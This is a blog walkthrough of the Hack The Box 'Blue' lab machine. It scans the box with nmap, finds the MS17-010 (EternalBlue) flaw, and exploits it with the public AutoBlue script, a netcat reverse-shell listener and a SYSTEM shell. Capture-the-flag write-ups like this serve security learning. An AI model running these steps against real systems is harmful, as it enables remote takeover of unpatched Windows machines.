Blue – Hack The Box Walkthrough Without Metasploit

This is a walkthrough of the Blue box from Hack The Box, done without using Metasploit.

1. Reconnaissance

Run an initial nmap scan for open TCP ports

nmap -sC -sV -O -p- -oA tcp_scan 10.10.10.40

  • -sC = run default nmap scripts
  • -sV = detect service version
  • -O = detect the OS
  • -p- = scan all ports
  • -oA tcp_scan = output all formats and save as a file called tcp_scan in the directory the current working directory

The results show us port 139 (Windows netbios), port 445 (microsoft-ds), port 135, 49152, 49153, 49154, 49155, 49156 & 49157 (msrpc)

Run one more scan, this time for UDP ports. UDP scans take a long time so this time I decided to do just the top 1000 ports. This still took almost an hour to complete and did not return any other ports that were open/exploitable (they were all filtered):

nmap -sU --top-ports 1000 -oA udp_scan 10.10.10.40

  • -sU = scan udp ports
  • –top-ports = scan only top 1000 ports

 

2. Enumeration

Run the nmap vulnerability scripts scan to check for vulnerabilities on the services we found running

nmap --script vuln -oA nmapvulns 10.10.10.40

The results show that this box is vulnerable to cve-2017-0143 (which was part of eternalblue exploit)

 

3. Exploitation

Search for a ms17-010 exploit on Google and find a promising exploit called AutoBlue (https://github.com/3ndG4me/AutoBlue-MS17-010). To download:

git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git

There are some great, clear instructions on the github page that explain what to do. First you need to run the shell prep script. As you follow the prompts, make sure to NOT select a meterpreter shell or a staged payload:

This generated a reverse shell payload and we will need to start a netcat listener to be the receiving end of the reverse shell. Use whatever port you entered as you were setting up your shell prep above. I used port 7777:

nc -nlvp 7777

The github instructions give us the syntax for running the exploit so set that up and hit enter to run the exploit:

python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin

After you run this, you should see a reverse shell generate on your listener (I had to run the script a few times to get it to work):

Run a whoami and you should see that you are running as authority\system (root). Grab your flags! I like to start by running a cd.. all the way back to C:\ and then running dir to see what’s in that directory. From there I navigate around until I find users/flags:

 

Leave a Reply

Your email address will not be published. Required fields are marked *